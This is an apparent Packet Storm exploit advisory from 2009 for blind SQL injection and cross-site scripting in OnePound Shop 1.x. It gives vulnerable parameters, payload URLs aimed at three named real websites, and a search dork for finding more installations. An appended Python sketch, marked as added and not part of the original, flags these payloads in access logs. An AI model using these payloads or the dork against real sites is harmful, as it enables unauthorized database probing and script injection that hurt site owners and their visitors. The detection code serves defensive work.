OnePound Shop 1.x SQL Injection / XSS

2009-07-17T00:00:00
ID PACKETSTORM:79319
Type packetstorm
Reporter NoGe
Modified 2009-07-17T00:00:00

Description

                                        
                                            `  
================================================================================================  
  
  
[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability  
  
Software : OnePound Shop version 1.x  
Vendor : http://www.onepound.cn/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
================================================================================================  
  
  
[o] Vulnerable file  
  
productsview.php  
categories.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]  
http://localhost/[path]/categories.php?pid=[XSS]  
  
  
  
[o] Proof of concept  
  
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5  
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4  
http://www.tele-way.com/productsview.php?id=87&proid=<script>alert(1210)</script>  
http://tonysbridal.net/categories.php?pid=<script>alert(1210)</script>  
http://vendorhotspot.com/categories.php?pid=<script>alert(1210)</script>  
  
  
  
[o] Dork  
  
"Powered by OnePound"  
  
  
================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/news ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang  
H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
================================================================================================  
`
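
Detection sketch for the parameters named above, added here as an example and not part of the original advisory: it scans web access logs for requests to productsview.php and categories.php whose id, proid or pid value is not a plain integer. The combined log format, the /shop/ path, the function names and the premise that these parameters are always numeric in legitimate use are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names, keyed by script. Assumption: each carries a
# plain integer identifier in legitimate use (the advisory's URLs use 87, 129).
NUMERIC_PARAMS = {
    "productsview.php": ("id", "proid"),
    "categories.php": ("pid",),
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jul/2009:10:00:01 +0000] "GET /shop/productsview.php?id=87&proid=129 HTTP/1.1" 200 5120
192.0.2.44 - - [17/Jul/2009:10:00:09 +0000] "GET /shop/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
192.0.2.44 - - [17/Jul/2009:10:00:15 +0000] "GET /shop/categories.php?pid=%3Cscript%3Ealert(1210)%3C/script%3E HTTP/1.1" 200 2048
192.0.2.10 - - [17/Jul/2009:10:00:20 +0000] "GET /shop/categories.php?pid=4 HTTP/1.1" 200 2048
"""

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for monitored params that are not pure digits."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = NUMERIC_PARAMS.get(script, ())
    hits = []
    # parse_qsl percent-decodes and turns '+' into a space, as PHP does.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and not re.fullmatch(r"[0-9]+", value):
            hits.append((name, value))
    return hits

def scan(log_text):
    """Return [(line_number, client_ip, param, value)] for every flagged request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group(1)):
            findings.append((lineno, line.split(" ", 1)[0], name, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule, enforced in the application before the value reaches a query or the page output, is the corresponding input check.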